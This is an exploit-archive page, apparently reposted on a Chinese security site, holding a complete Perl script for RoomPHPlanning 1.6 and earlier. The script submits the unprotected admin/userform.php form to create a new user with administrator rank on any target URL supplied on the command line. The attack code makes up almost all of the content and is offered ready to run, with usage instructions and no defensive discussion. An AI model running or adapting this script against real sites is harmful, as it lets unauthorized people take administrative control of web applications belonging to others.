RoomPHPlanning <= 1.6 (userform.php) Create Admin User Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

RoomPHPlanning <= 1.6 (userform.php) Create Admin User Exploit

来源：http://www.shell-storm.org 作者：Salwan 发布时间：2009-03-11

#!/usr/bin/perl -w

use LWP::UserAgent;
use HTML::Form;

print "_________________________________________________________\n";
print "[+]=>RoomPHPlanning\n";
print "[+]=>v1.x\n";
print "[+]=>Vul: Remote Create user with all permissions (admin)\n";
print "[+]=>Author: Jonathan Salwan \n";
print "[+]=>Web: http://www.shell-storm.org\n";
print "[+]=>Mail: submit [AT] shell-storm.org\n";
print "_________________________________________________________\n\n";

sub usage {
print "[+]=>usage: <file.pl> <host_&_patch> <login> <password>\n";
print "[+]=>Ex: flood.pl http://localhost/patch/ admin2 toto\n";exit;
}

if ($#ARGV < 2) {usage();}

$patch = "/admin/userform.php";
$host = $ARGV[0].$patch;
$login = $ARGV[1];
$pwd = $ARGV[2];
$name = "Administrateur";
$rank = "1";

print "[+]=>Sending...\n";

    my $u = LWP::UserAgent->new(agent => 'Mozilla/4.73 [en] (X11; I; Linux 2.2.16 i686; Nav)' );
my $req = HTTP::Request->new( GET => "${host}" );
my $res = $u->request($req);
my $send = HTML::Form->parse( $res->content, $host );

    $send->find_input('name')->value($name);
    $send->find_input('login')->value($login);
    $send->find_input('pwd')->value($pwd);
$send->find_input('rank')->value($rank);

$u->request( $send->click );

print "[+]=>Done!\n";
print "[+]=>Now, user $ARGV[1] is admin\n";

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告